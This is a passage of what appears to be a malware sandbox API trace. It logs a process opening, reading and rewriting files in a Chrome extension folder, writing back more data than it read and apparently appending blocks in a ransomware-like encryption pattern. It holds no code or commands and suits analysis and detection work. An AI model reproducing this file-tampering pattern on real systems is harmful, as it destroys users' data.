lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.875] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb308, nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x359f2bc*=0xf9, lpOverlapped=0x0) returned 1 [0164.877] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0164.877] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfe118*, nNumberOfBytesToWrite=0x681, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x3cfe118*, lpNumberOfBytesWritten=0x359f2d0*=0x681, lpOverlapped=0x0) returned 1 [0164.877] CloseHandle (hObject=0x1d8) returned 1 [0164.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.878] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.878] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1a1d [0164.878] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.878] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.878] ReleaseMutex (hMutex=0x168) returned 1 [0164.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app.css", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0164.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cast_app.css", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cast_app.css", lpUsedDefaultChar=0x0) returned 12 [0164.878] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1a1d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f2bc*=0x1a1d, lpOverlapped=0x0) returned 1 [0164.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0164.880] WriteFile (in: hFile=0x1d8, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1fa5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f2d0*=0x1fa5, lpOverlapped=0x0) returned 1 [0164.880] CloseHandle (hObject=0x1d8) returned 1 [0164.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.882] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.882] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x174c [0164.882] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.882] ReleaseMutex (hMutex=0x168) returned 1 [0164.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="view.html", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0164.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="view.html", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="view.html", lpUsedDefaultChar=0x0) returned 9 [0164.882] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x174c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f2bc*=0x174c, lpOverlapped=0x0) returned 1 [0164.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0164.884] WriteFile (in: hFile=0x1d8, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1cd4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f2d0*=0x1cd4, lpOverlapped=0x0) returned 1 [0164.884] CloseHandle (hObject=0x1d8) returned 1 [0164.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_cast_streaming.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.885] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.885] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7c33 [0164.885] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.886] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.886] ReleaseMutex (hMutex=0x168) returned 1 [0164.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_cast_streaming.js", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0164.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mirroring_cast_streaming.js", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mirroring_cast_streaming.js", lpUsedDefaultChar=0x0) returned 27 [0164.886] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.889] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6c33 [0164.889] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6c33 [0164.890] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.891] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0164.891] WriteFile (in: hFile=0x1d8, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.891] CloseHandle (hObject=0x1d8) returned 1 [0164.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.892] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.892] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x405d [0164.892] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.892] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.892] ReleaseMutex (hMutex=0x168) returned 1 [0164.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.893] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.894] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x305d [0164.894] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.895] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x305d [0164.895] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.895] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0164.895] WriteFile (in: hFile=0x1d8, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.895] CloseHandle (hObject=0x1d8) returned 1 [0164.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x46f5 [0164.896] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.896] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.897] ReleaseMutex (hMutex=0x168) returned 1 [0164.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.897] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.898] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x36f5 [0164.898] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.899] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x36f5 [0164.899] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.899] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0164.900] WriteFile (in: hFile=0x1d8, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.900] CloseHandle (hObject=0x1d8) returned 1 [0164.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3e5d [0164.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.901] ReleaseMutex (hMutex=0x168) returned 1 [0164.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.901] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.903] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2e5d [0164.903] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.903] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2e5d [0164.904] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.905] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0164.905] WriteFile (in: hFile=0x1d8, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.905] CloseHandle (hObject=0x1d8) returned 1 [0164.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.906] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.906] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x583f [0164.906] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.906] ReleaseMutex (hMutex=0x168) returned 1 [0164.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0164.907] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.908] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x483f [0164.908] ReadFile (in: hFile=0x1d8, lpBuffer=0x2877c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0164.909] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x483f [0164.909] WriteFile (in: hFile=0x1d8, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0164.909] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0164.909] WriteFile (in: hFile=0x1d8, lpBuffer=0x2877c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2877c48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0164.910] CloseHandle (hObject=0x1d8) returned 1 [0164.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0164.910] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.911] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3fdc [0164.911] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0164.911] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0164.911] ReleaseMutex (hMutex=0x168) returned 1 [0164.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 